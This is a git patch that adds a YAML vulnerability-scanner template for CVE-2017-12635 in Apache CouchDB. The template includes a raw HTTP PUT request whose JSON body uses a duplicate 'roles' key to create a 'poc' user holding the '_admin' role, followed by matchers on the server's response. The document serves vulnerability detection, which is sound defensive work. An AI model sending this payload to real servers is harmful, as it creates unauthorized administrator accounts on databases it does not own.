From 123b9e32eaa3764d35e6c2fad184a46f0668abf0 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Mon, 15 Feb 2021 13:31:56 +0000
Subject: [PATCH] Add Apache CouchDB(CVE-2017-12635)

---
 cves/2017/CVE-2017-12635.yaml | 48 +++++++++++++++++++++++++++++++++++
 1 file changed, 48 insertions(+)
 create mode 100644 cves/2017/CVE-2017-12635.yaml

diff --git a/cves/2017/CVE-2017-12635.yaml b/cves/2017/CVE-2017-12635.yaml
new file mode 100644
index 0000000000..0c005b9418
--- /dev/null
+++ b/cves/2017/CVE-2017-12635.yaml
@@ -0,0 +1,48 @@
+id: CVE-2017-12635
+
+info:
+  name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 RPE
+  author: pikpikcu
+  severity: high
+  reference: https://github.com/assalielmehdi/CVE-2017-12635
+  tags: couchdb,rpe
+
+requests:
+  - raw:
+      - |
+        PUT /_users/org.couchdb.user:poc HTTP/1.1
+        Host:  {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Accept: application/json
+        DNT: 1
+        Connection: close
+        Upgrade-Insecure-Requests: 1
+        Content-Length: 108
+
+        {
+          "type": "user",
+          "name": "poc",
+          "roles": ["_admin"],
+          "roles": [],
+          "password": "123456"
+        }
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "application/json"
+          - "Location:"
+        part: header
+        condtion: and
+      - type: word
+        words:
+          - "org.couchdb.user:poc"
+          - "conflict"
+          - "Document update conflict"
+        part: body
+        condtion: and
+      - type: status
+        status:
+          - 201
+          - 409